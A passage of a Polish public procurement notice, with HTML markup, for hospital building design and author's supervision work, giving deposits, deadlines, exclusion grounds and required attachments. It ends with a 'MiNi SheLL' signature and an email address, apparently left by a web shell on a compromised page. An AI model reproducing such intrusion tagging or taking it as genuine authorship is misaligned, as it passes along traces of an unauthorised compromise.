dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. Osoba projektanta musi posługiwać się językiem polskim.<br/><br/>Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia Wykonawcy pn. „Wykaz osób”, którego wzór stanowi załącznik nr 2.3 do SWZ. <br/>UWAGA<br/>Doświadczenie projektanta skierowanego przez Wykonawcę do realizacji niniejszego zamówienia stanowi kryterium oceny ofert, zgodnie z Sekcją XXI ust. 3 pkt 2 SWZ. W przypadku jeśli Wykonawca zamierza ubiegać się o punkty w tym kryterium tj. „Doświadczenie osoby wyznaczonej do realizacji zamówienia”, wówczas osoba wskazana w załączniku nr 2.3 do SWZ “Wykaz osób” musi być również osobą wskazaną przez Wykonawcę w Formularzu Ofertowym Wykonawcy tabela 4 (załączniku nr 1 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest wnieść wadium. Każda składana oferta musi być zabezpieczona wadium w wysokości 2 000 zł (słownie: dwa tysiące złotych 00/100)<br/>2.	Wadium wnosi się przed upływem terminu składania ofert, tj. przed godz. 09:00 w dniu 13.11.2025 r. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy Zamawiający przewidział szczegółowo w paragrafie 11 wzoru umowy - załączniku nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-13 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, że (zgodnie z zapisami SWZ) z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie:<br/>- art. 108 ust. 1 ustawy Prawo zamówień publicznych,<br/>- art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego .<br/><br/>Termin wykonania przedmiotu zamówienia:<br/>1. Wykonawca wykona przedmiot zamówienia w zakresie wskazanym w Sekcji III ust. 1 pkt 1) i pkt 2) Specyfikacji Warunków Zamówienia w terminie 60 dni od daty zawarcia umowy.<br/>2. Z zastrzeżeniem ust. 3 poniżej, przedmiot zamówienia w zakresie wskazanym w Sekcji III ust. 1 pkt 3) Specyfikacji Warunków Zamówienia (nadzór autorski) sprawowany będzie przez Wykonawcę od dnia zawarcia przez Zamawiającego umowy na roboty budowlane dla zadania inwestycyjnego, o którym mowa w Sekcji III ust. 1 pkt 1) Specyfikacji Warunków Zamówienia i trwał będzie nieprzerwanie do końcowego odbioru i rozliczenia robót budowlanych (przewidywany czas na odbiór i rozliczenie - jeden miesiąc po zakończeniu robót budowlanych) oraz uzyskania pozwolenia na użytkowanie budynku nr 3B włącznie. Planowany termin zakończenia robót budowlanych zadania inwestycyjnego, o którym mowa w niniejszym punkcie to 30 czerwiec 2028 r. <br/>3. Wykonawca, w ramach czynności nadzoru autorskiego zobowiązany jest do udzielania pisemnych odpowiedzi na zapytania Zamawiającego - w terminie 2 dni roboczych od dnia przekazania Wykonawcy treści zapytania - w trakcie trwania ogłoszonego przez Zamawiającego postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych w oparciu o opracowaną przez Wykonawcę Dokumentację po korekcie oraz Dokumentację projektową.<br/><br/>W ramach niniejszego postępowania Wykonawca składa dokumenty i oświadczenia wymagane w SWZ, w tym między innymi: Załącznik nr 1 do SWZ - Formularz ofertowy Wykonawcy, Załącznik nr 2 do SWZ - Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, Załącznik nr 2.1 do SWZ - Oświadczenie Wykonawcy o zakresie wykonania zamówienia przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy), Załącznik nr 2.2 do SWZ - Wykaz usług, Załącznik nr 2.3 do SWZ - Wykaz osób, Załącznik nr 3 do SWZ - Oświadczenie o zobowiązaniu podmiotu oddającego do dyspozycji Wykonawcy niezbędne zasoby na potrzeby realizacji zamówienia (jeżeli dotyczy).

Creat By MiNi SheLL
Email: jattceo@gmail.com